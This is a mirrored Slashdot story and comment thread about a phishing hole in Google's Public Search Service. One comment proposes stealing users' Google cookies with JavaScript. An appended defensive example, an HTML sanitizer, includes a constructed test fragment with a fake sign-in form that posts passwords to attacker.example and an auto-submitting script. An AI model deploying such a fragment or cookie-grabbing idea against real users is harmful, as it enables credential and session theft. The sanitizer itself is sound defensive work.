Slashdot Mirror


Google Public Service Search Makes for Easy Phishing

lisah writes "According to reports at NewsForge this morning, Developer Eric Farraro has discovered a potential hole in Google's Public Search Service that may leave the door wide open for phishing scams. The Public Search Service, designed to allow universities and other non-profit institutions to add Google search capabilities to their websites, provides code that allows website developers to customize the header and footer of the search results page. Handy (and malicious) coders can manipulate the headers and footers to create what looks like a Google sign-in page and then collect the login names and passwords of unsuspecting users." NewsForge and Slashdot are both owned by OSTG.

7 of 40 comments

  1. Any major web service has this non-issue by mounthood · Score: 2, Insightful

    If you make a Yahoo! Store that looks like Yahoo mail ... or an MSN page that looks like hotmail ...

    --
    tomorrow who's gonna fuss

  2. Try the address.... by dontbflat · Score: 3, Insightful

    And you find that the Google www.google.com/u/gplus doesn't work now. I'll say one thing. They sure are quick. Now they should just put those search results in an IFRAME that you can't change, like the AdSense code.

    People are always looking for new ways to get user/pass from unsuspecting users. The internet is used to hurt the ignorant. I just hope I won't fall into such a good-looking trap.

  3. Re:Not a google issue... by dontbflat · Score: 5, Insightful

    It's Google's issue because they are HOSTING it. If they weren't hosting the code, then fine. But they are, and that's where the problem lies.

  4. Re:Not a google issue... by Infinityis · Score: 4, Insightful

    The problem is that usually people can type in the URL from a suspicious-looking email and prevent phishing attacks. In this case, typing in the URL took you to precisely the same site. All the anti-phishing advice you've been giving your family and friends would prove useless under these circumstances.

  5. Screw up of Google by mapkinase · Score: 4, Insightful

    This is a very Google-specific screw-up. It is not like they forgot to change some default setting; it is a specifically designed feature that went wrong.

    Google certainly does not do evil, but it is not exactly catching in the rye.

    --
    I do not believe in karma. "Funny"=-6. Do good and forbid evil. Yours, Oft-Offtopic Flamebaiting Troll.

  6. Bad habits by thesandtiger · Score: 1, Insightful

    Generally, unless I have specifically typed in a URL I know is safe, I will at the very least check the address bar of my browser before signing in to something. That means that any time there's a link to something - even from a source that I trust - I will check to make sure I am where I think I am. Of course, I'm slightly paranoid, and I would expect that the average user doesn't do this kind of thing. It's kind of like the "secure" commerce sites - how many people actually check for the little lock/key thingy? Probably most on /., but in the real world it seems like a shiny website with stuff mainly spelled correctly is good enough for most.

    And speaking of laziness.... Why is it that the only "editorial" behavior /. editors do is the "full-disclosure" thing with stories that are somehow associated with /. or their masters?

    It's like "Oh, we won't bother ensuring that something's not a dupe, and we won't bother to spell, grammar or fact check submissions - but hey, we can sure look all editorly if we just do that disclosure thingy! LOOKIT ME!!! I CAINT SPEL EDITIR, BUT I ARE WON!!!!"

    Sorry. (And good-bye, karma!)

    --
    Since I can't tell them apart, I treat all ACs as the same person.

  7. What about using js to grab cookies? by mbannonb · Score: 2, Insightful

    Instead of using JavaScript to create a modified form, why not use JavaScript to grab the user's Google cookies and send them to yourself while on the google.com domain?
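As an added example (not code from the article, Google, or any commenter): the summary's hole is that a customer-supplied header/footer is rendered verbatim on the hosting site's own origin, so any form, script or event handler in it runs as that site, which is also what the cookie-grabbing variant in the last comment relies on. Besides the IFRAME isolation suggested above, the host can sanitize the fragment against an allowlist before rendering it and keep a record of what it had to strip; the allowlist, the `attacker.example` host and the sample fragment below are all constructed.

```python
import html
from html.parser import HTMLParser
# Constructed allowlist (an assumption, not any provider's real policy): static layout only.
ALLOWED_TAGS = {"a", "b", "br", "div", "h1", "h2", "img", "p", "span", "table", "td", "tr"}
ALLOWED_ATTRS = {"href", "src", "alt", "title", "class", "width", "height"}
VOID_TAGS = {"br", "img", "input", "hr", "meta", "link", "embed", "source"}

class FragmentSanitizer(HTMLParser):
    # Re-emits only allowlisted markup and records every dropped tag/attribute.
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.dropped, self._skip = [], [], []  # _skip: open dropped elements

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.dropped.append(tag)
            if tag not in VOID_TAGS:          # discard the element's body as well
                self._skip.append(tag)
        if self._skip or tag not in ALLOWED_TAGS:   # dropped, or nested inside a dropped element
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            bad_url = name in ("href", "src") and value.strip().lower().startswith(("javascript:", "vbscript:", "data:"))
            if name.startswith("on") or name not in ALLOWED_ATTRS or bad_url:
                self.dropped.append(f"{tag}@{name}")
                continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if self._skip and self._skip[-1] == tag:
            self._skip.pop()
        elif not self._skip and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:
            self.out.append(html.escape(data, quote=False))

def sanitize_fragment(fragment):
    p = FragmentSanitizer()
    p.feed(fragment)
    p.close()
    return "".join(p.out), p.dropped   # (clean HTML, list of what was stripped)

# Constructed sample: a "header" that tries to pass itself off as a sign-in box.
SAMPLE = ('<div class="hdr"><h1>Example University</h1><form action="http://attacker.example/c">Sign in: '
          '<input name="user"><input type="password" name="pw"></form><script>document.forms[0].submit()</script>'
          '<a href="javascript:alert(1)" onclick="x()">Help</a></div>')
```

A non-empty `dropped` list on a template submission is itself a useful signal: a legitimate header should never need a form, a script or an event handler.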